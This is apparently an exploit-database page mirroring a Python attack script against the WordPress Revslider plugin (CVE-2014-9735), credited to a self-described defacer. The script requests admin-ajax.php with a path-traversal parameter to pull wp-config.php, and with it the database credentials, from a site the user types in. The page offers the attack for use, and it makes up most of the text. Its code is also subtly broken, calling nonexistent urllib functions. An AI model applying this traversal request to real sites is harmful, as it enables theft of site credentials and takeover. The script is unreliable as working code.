Advertisement






WordPress Revslider Exploit Grab Config

CVE Category Price Severity
CVE-2014-9735 CWE-20 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-09-27
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090129

Below is a copy:

WordPress Revslider Exploit Grab Config
#################################
# Exploit Title: WordPress Revslider Exploit Grab Config
# Author: Xale [ Turkish Defacer ]
# Date: 27.09.2021
# Greetz: BetLex & Qualwin & Deus Lorenzo & GaskmanTR & 0X4-Team
# Tested On: Kali Linux
# Risk: Medium - High
##################################

Coded With Python 
revslider.py

import os
import urllib.request

os.system("sudo apt-get install figlet")
os.system("clear")
os.system("figlet XALE")
print(" ")
print("Revslider Exploit | Grab Config | Coded By Xale")
print(" ")
targets = input("Target WordPress Site: (Sample: example.com) ")

target = targets + "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"

htm = urllib.request.open(target)
print("Grabbed Config: (Connect: Adminer)")
print(" ")
print(htm.open())

GitHub: https://github.com/xaletr/RevSlider-Exploit

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.